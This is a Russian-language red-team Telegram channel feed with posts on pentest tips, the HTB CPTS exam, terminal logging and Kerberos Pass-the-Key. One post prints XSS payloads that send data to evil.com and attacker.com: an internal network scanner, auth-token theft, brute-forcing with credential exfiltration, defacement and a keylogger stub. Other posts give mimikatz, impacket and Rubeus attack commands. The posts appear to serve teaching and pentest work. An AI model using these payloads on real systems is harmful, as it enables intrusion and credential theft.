Доброго времени суток, друзья!🎉 У нас небольшие изменения на канале! 🛠️!

Мы рады представить обновленный состав нашей команды авторов 🥰:

@closed_character - red team
@pyfffe - red team
@Huioofy - red team

Мы всегда стремимся улучшить ваш опыт, поэтому решили добавить хештеги для удобной навигации по контенту канала #️⃣:

#redteam - статьи и посты из мира ИБ со стороны нападения
#blueteam - статьи и посты из мира ИБ со стороны защиты
#REDtalk - новости и анонсы канала
#meme - мемы наше все
#ToolTricks - различные интересные лайфхаки или обзоры инструментов несвязанных с red team или blue team

🔥 Привет! Когда-нибудь настанет момент, когда появится задача по брутфорсу чего-либо на срок, сильно превышающий несколько часов, и было бы круто автоматизировать запуск, мониторинг и конечный просмотр атаки.

Можно ли сделать телеграм-бота без использования специализированных фреймворков и навыков программирования?

Конечно можно. 🔗 Вот пример прямого обращения к API, используя curl

Тут присутствует задержка между спреями для избежания блокировки, и время сна, на случай, если что-то положится, то хотя бы не ночью. И конечно же подключён бот, буквально двумя строками кода

#redteam

Привет, друзья! 👋

Принёс вам историю из реальных кейсов по пентесту — всё как вы любите: взломы, стрельба, горящие админы. 🔥 Готовьте попкорн, потому что будет жарко! 😎

Всем приятного чтения, а я дальше пойду добивать свой отпуск! 🏖️

Ссылочка на статью: https://shankdy.notion.site/112cfaa22e1e8017a274c546dee209d5

#redteam

🎆 Привет!

Нежданно-негаданно приехала новая часть постов про антивирусы.
Это третья часть из серии постов про мой опыт изучения работы антивирусных средств и EDR. В ней была проведена работа над ошибками предыдущих частей и далее рассказано и показано про работу meterpreter и msfvenom.

Ссылка: 🔗 Тык

Основная её цель - показать, что у метерпретера, и метасплоита существует 👀 исходный код и официальная документация , на что стоит обращать внимание при изучении их работы.

Приятного чтения!

#redteam

« Всё это было только ради поста ( @pyfffe ) »

💥 Привет! А я тут 🔗 налутал HTB CPTS и спешу поделиться мыслями и лайфхаками по этому сертификату. Для начала несколько вступительных слов.

❓ Что там за задание?
Дан лабораторный стенд с эмуляцией инфраструктуры небольшой компании, с линуксами и виндовсоми. Цель — взломать и написать отчёт по проведению пентеста. Присутствует возможность полной перезагрузки стенда.

❓ Какие ограничения?
Дедлайн — 10 дней включительно (также входит одна попытка на пересдачу). В инструментах не ограничивают. Прокторинга нет. Шаблон для отчета дадут.

Теперь лайфхаки:

*️⃣ Во первых очень важно спланировать свое время. Может показаться, что 10 дней — это много, но в моём случае потребовалось тратить по 8-10 часов в день. Если же у вас нет столько свободного времени, можно использовать еще 10 дней из попытки пересдачи. Также выделите несколько дней на оформление отчета.

*️⃣ Перед началом сдачи подготовьте рабочее пространство. Убедитесь, что у вас работает то, о чем говорить нельзя, и сетевой VPN трафик до стенда не блокируется. Если его всё-таки блокируют, то есть два выхода:
1️⃣Первый - использовать предоставленный для сдачи экзамена Pwnbox (выделенную виртуальную машину с ParrotOS), но у него два основных минуса - это подключение по VNC через браузер, без возможности ctrl+c ctrl+v, и ограниченное время работы, из-за чего приходится перезапускать виртуалку. В общем, это не мой путь 💀
2️⃣Второй выход - это арендовать VPS, с которого будет работать OpenVPN к лабе, и работать через него. Больше гемора с настройкой, но удобнее и реалистичнее

*️⃣ Вы единственный пользователь стенда, а значит ничего не мешяет добавить туда такие вектора атак, которые неприменимы для обычных HTB-Коробок.

*️⃣ В отчете нужно будет показать все шаги компрометации так, чтобы это смогла повторить бабушка админа, поэтому логируйте каждый шаг взлома, Включая, к примеру, mimicatz.exe lsadump::sam и sharphound.exe -c All.

*️⃣ Лаба несложная, zero-day нет, Вся информация есть либо на HTB Academy, либо в гугле. Однако, тут много кроличьих нор, из-за чего необходимо досконально проверять каждый предположительный вектор атаки.

Ну вот вроде всё. У меня сдача заняла 9 дней, отчет проверяли 5 рабочих дней. Результатом доволен 👾

#redteam

Привет, друзья! 😻

Немного дружественного контента. Сегодня в 20:00 наш хороший товарищ и коллега Владимир Кочанов, с которым мы не раз обсуждали безопасность бизнеса, в том числе в рамках информационной безопасности, проведет стрим на тему: «Как понять, что пора создавать службу безопасности?»

Владимир поделится опытом и ответит на важные вопросы:

🔸 На каком этапе развития компании становится критично задуматься о безопасности?
🔸 Как донести до акционеров, что безопасность — это инвестиция, а не пустая трата?

Если думаете, как провести вечер, — рекомендуем присоединиться! 👍

🔗 Ссылка на стрим: https://t.me/sbprobiz?livestream

👨‍💻 Привет! В последнее время я все чаще наблюдаю в пентестах и багбаунти сдачу XSS-уязвимостей без подробного описания импакта от этой уязвимости, как будто достаточно показать, что отрабатывает функция alert и всплывает popup-окно с тестом “я хакер”. А при благоприятных условиях даже перехватить свою куку. Как следствие, такие репорты могут пометить низким приоритетом и закинуть в долгий ящик.

Я хочу осветить несколько необычных векторов атак, которые можно использовать при различных инъекциях в веб-страницу, помимо кражи сессии из кук.

1️⃣ Сначала база - CSRF. если на сайте с XSS присутствуют незащищённые аутентифицированные запросы, можно совершить их от имени пользователя. Также никто не запрещает помимо целевого ресурса бегать по внутренней сети пользователя. Вот пример сканера открытого порта 80 внутренней сети

async function checkPort(ip) {
  try {
    const controller = new AbortController();
    const timeout = setTimeout(() => controller.abort(), 2000); // Таймаут 2 секунды

    const response = await fetch(`http://${ip}`, {
      method: 'HEAD',
      signal: controller.signal
    });
    clearTimeout(timeout);

    if (response.ok) {
      fetch(`https://evil.com/open?ip=${ip}`);
    }
  } catch (e) {
  }
}

async function scanNetwork(startIP, endIP) {
  const start = "192.168.1."

  for (let octet= 1; octet<= 254; ipNum++) {
    const ip = start + String(octet)
    checkPort(ip); // Проверяем каждый IP
  }
}

// Запуск сканера
scanNetwork(startIP, endIP);

2️⃣ Если вместо куки сессия хранится в local/session storage и передается через заголовок Authorization, то при неправильной настройке CSP её тоже можно перехватить

fetch("https://evil.com/steal", {
  method: "POST",
  headers: {
    "Authorization": localStorage.getItem("authToken"),
  },
});

3️⃣ XSS - это инъекция кода, а значит можно использовать вычислительные ресурсы. Я видел вектор распределенной брутфорс-атаки, что-то наподобие ботнета. Как пример, при загрузке скрипта жертва получает список хостов, логинов и паролей и начинает их брутить из своего браузера.

 const attackServer = "https://attacker.com/report";
 // Список паролей можно подгрузить запросом к сайту злоумышленника
 const passwords = ["password123", "admin", "123456", "qwerty"];
  
  passwords.forEach(password => {
    fetch("https://mail.google.com/login", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({
        username: "admin", 
        password: password
      })
    })
    .then(response => {
      // Отправляем найденные креды
      if (response.status === 200) {
        fetch(attackServer, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ username: "admin", password: password })
        });
      }
    });
  });

<продолжение далее>

<продолжение>

4️⃣ Если обнаружена хранимая XSS где-то на главной странице, то можно сделать дефейс, то есть изменить содержание страницы и добавить лозунги про квадроберов, или просто сделать страницу нефункциональной:

<script>document.body.innerHTML="<h1>Этот сайт был взломан. Все данные пользователей скомпрометированы</h1>";</script>

5️⃣ Помимо дефейса можно внедрить свои рекламные баннеры. Такой вектор обычно используется вирусами на скомпрометированном компьютере пользователя, но можно и через HTML-Injection:

<div id="ad" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: white; z-index: 1000; display: flex; justify-content: center; align-items: center;">
  <div style="position: relative; background: #f9f9f9; padding: 20px; border: 1px solid #ccc; box-shadow: 0 0 10px rgba(0,0,0,0.2);">
    <div style="position: absolute; top: -10px; right: -10px; cursor: pointer;" onclick="document.getElementById('ad').remove();">❌</div>
    <h3>Special Offer!</h3>
    <p>Click below to learn more:</p>
    <a href="https://example.com" target="_blank">Learn More</a>
  </div>
</div>

6️⃣ Кейлоггер. Да, это тоже можно сделать, причем очень просто, через встроенный ивент onkeypress:

<script>
    var l = "";
    document.onkeypress = function (e) {
        l + e.key;
        console.log(l); // Можно отправлять каждый введенный символ на наш сервер
    }
</script>

Как-то так 👀
Цель этого поста — показать, что, несмотря на эволюцию браузеров за последние 10 лет, XSS-уязвимости всё еще могут наносить серьезный импакт.

#redteam

🎆 Привет!

Хотим рассказать про канал наших друзей (да, у нас такие есть) и коллег по цеху. Там вы найдете заметки про Ред и Блю тим, и в целом про техническую ИБ.

Приглашаем в RedBlue Notes

❤️ С Международным днём защиты информации! 🤩

В мире безопасности есть свои "синие" — те, кто держит защиту под контролем, "красные" — те, кто не даёт им расслабляться, "фиолетовые" — те, кто объединяет усилия первых двух, и даже "жёлтые" — всегда готовые внести свежие идеи и нестандартные подходы к безопасности. Это не просто работа, а целая палитра усилий, где каждый цвет добавляет что-то важное🥰. А Вместе мы создаём настоящую картину безопасности!

Пусть инструменты работают,
идеи сверкают, а времени на отдых всегда хватает. Спасибо всем, кто делает этот цифровой мир ярче и безопаснее! 🛡

#REDtalk

Всем привет! 😎

Часто слышу вопрос:

С чего начать путь в ИБ?

Друзья, ну очевидно же, что любому уважающему себя хацкеру надо начинать со взлома Пентагона😄! Но если без шуток, то начинать стоит с хорошей базы. Разберитесь, как устроены сети и ваши любимые тырнетики.

А чтобы не блуждать в потёмках и не хвататься за все подряд, делюсь с вами отличным ресурсом. Он подойдет как новичкам для старта, так и опытным специалистам для закрытия пробелов в знаниях:

🔗 Roadmap Cyber Security

На этом сайте вы найдете дорожную карту для специалистов по кибербезопасности, которая охватывает всё:

💻 Основы сетевых технологий

🛡 Криптографию

⌨️ Pentest

🖥 Методы защиты инфраструктуры и многое другое.

Ресурс обновлен для 2024 года, поэтому всё достаточно актуально и полезно.

Исследуйте, учитесь и уверенно двигайтесь вперед! Успехов на вашем пути! 💪

#blueteam #redteam

👨‍💻 Привет!

Представим ситуацию — Вы сидите, проводите пентест, и в какой-то момент к вам приходит злой заказчик и говорит, что вы положили его инфру. Вы опешили, всё отрицаете, ведь во время тестирования атаки не было деструктивных методов. Но заказчик всё не успокаивается, показывает логи, мол, вот, в это время на нас упало куча трафика.

И в этот момент очень пригодились бы логи всех действий во время проведения тестирования. Поэтому вот простой лайфхак, который автоматически будет записывать 90% действий и поможет понять, были ли пентестеры причастны к инциденту или нет.

1️⃣ Для начала стоит добавить дату и время при каждом выполнении команды в терминале. Для этого можно модифицировать промпт вашего командного интерпретатора.

Тут ничего сложного, открываем rc файл и меняем соотсутсвующую переменную.

zsh (kali linux): Заменить PROMPT в ~/.zsh_rc

PROMPT=$'%F{%(#.blue.green)}┌──%{$fg[yellow]%}[%D{%d.%m.%y} %D{%H:%M}]\n%F{%(#.blue.green)}├──${debian_chroot:+($debian_chroot)─}${VIRTUAL_ENV:+($(basename $VIRTUAL_ENV))─}(%B%F{%(#.red.blue)}%n'$prompt_symbol$'%m%b%F{%(#.blue.green)})-[%B%F{reset}%(6~.%-1~/…/%4~.%5~)%b%F{%(#.blue.green)}]\n└─%B%(#.%F{red}#.%F{blue}$)%b%F{reset} ' 

bash (kali linux): Заменить PS1 в ~/.bash_rc

PS1=$prompt_color'┌──[\D{%d.%m.%Y %H:%M}]\n'$prompt_color'├──${debian_chroot:+($debian_chroot)──}${VIRTUAL_ENV:+(\[\033[0;1m\]$(basename $VIRTUAL_ENV)'$prompt_color')}('$info_color'\u'$prompt_symbol'\h'$prompt_color')-[\[\033[0;1m\]\w'$prompt_color']\n'$prompt_color'└─'$info_color'\$\[\033[0m\] ';; 

Теперь в листинге каждая команда будет иметь дату и время начала и конца выполнения (как на скриншоте к посту)

2️⃣ Далее нужно настроить автоматическую запись листинга. Тут на помощь придет TMUX. Правильно настроенный терминальный мультиплексор может стать мощным инструментом по сравнению с ГУИшными терминалами.

Для записи истории команд нужно установить плагин и добавить конфигурацию при каждом запуске tmux.

$> git clone https://github.com/tmux-plugins/tpm ~/.tmux/plugins/tpm 
 
# Конфиг должен выглядить так 
$> cat .tmux.conf  
 
# Список плагинов 
set -g @plugin 'tmux-plugins/tpm' 
set -g @plugin 'tmux-plugins/tmux-sensible' 
set -g @plugin 'tmux-plugins/tmux-logging' 
set -g history-limit 500000 
 
# Запуск Tmux Plugin Manager 
run '~/.tmux/plugins/tpm/tpm' 
 
$> tmux source ~/.tmux.conf 

Осталось зайти в tmux и нажать CTRL + b и SHIFT + i. Теперь при каждом запуске tmux можно начать запись с помощью CTRL + b, SHIFT + p и сразу после выхода из терминала запись будет сохранена в домашнюю директорию в виде текстового файла.

Теперь мы точно будем уверены, что во время инцидента со стороны пентестеров активности не было и мы не в чем не виноваты. Конечно, листинг команд работает только для CLI. С GUI нужно разбираться отдельно.

#redteam #ToolTricks

Привет, друзья! 🤩

У нас для вас крутая новость🚀! Сегодня в 20:00 наш хороший товарищ Владимир Кочанов проведет стрим на тему: «Руководитель — как им стать?»

Вас ждёт разбор актуальных и интересных вопросов:

❕ Какие софт скиллы нужны, чтобы стать успешным руководителем?

❕ Как найти общий язык с коллегами разных поколений?

❕ Отличаются ли подходы к управлению в разных отделах?

❕ Что делает функцию СБ (службы безопасности) особенной?

Если хотите провести вечер с пользой — присоединяйтесь 🔥! Будет интересно и полезно для всех, кто стремится к развитию и лидерству.

👉 Ссылка на стрим: https://t.me/sbprobiz?livestream

Сегодня вспомним о защите...
А точнее о Protected Users, вспомним в контексте пентеста конечно😎
Ну и не забудем про PTK (ай, спойлеры😐)

Обычно, когда в ходе пентеста мы видим УЗ с одинаковыми (похожими) ФИО, но разными правами в домене (особенно, если вторая УЗ - админ домена), первое, что приходит в голову: сейчас реюзнем пароль и заовним эти ваши актив директори🙏
Довольные идём в netexec, делаем Pass-The-Hash и получаем STATUS_ACCOUNT_RESTRICTION 😐

Как все было легко, если бы не Protected Users👀
В чем соль защиты:
▪️Учетные данные защищенных пользователей не будут кэшироваться (да, дамп LSASS вам больше не поможет).
▪️Для защищенных пользователей аутентификация Kerberos не будет генерировать ключи DES или RC4, а также не будет кэшировать текстовые учетные данные или долгосрочные ключи после первоначального получения Ticket-Granting Ticket (TGT) (да, с использованием NTLM тикет не запросить).
▪️NTLM и одноразовая функция NTLM (NTOWF) заблокированы (*грустный вздох*).

Контра: использование AES ключа и Pass-The-Key.🎸
Да, придется делать эскалацию в домене и при помощи, например, УЗ с DCsync получать ключик админа домена с домен контроллера👀

Обещанная напоминашка по PTK😶:
Pass The Key (PTK) предназначена для сред, в которых традиционный протокол NTLM ограничен, а приоритет отдается аутентификации Kerberos. Эта атака использует NTLM-хэш (в нашей ситуации не подходит) или AES-ключи (то, что нужно) пользователя для получения билетов Kerberos, что позволяет получить несанкционированный доступ к ресурсам в сети.

Команда для линуха:

impacket-getTGT DOMAIN/username -aesKey KEY

Команда для винды:

.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec

Как-то так, защищайте своих админов домена, но мы все равно придём за ними 😒

#redteam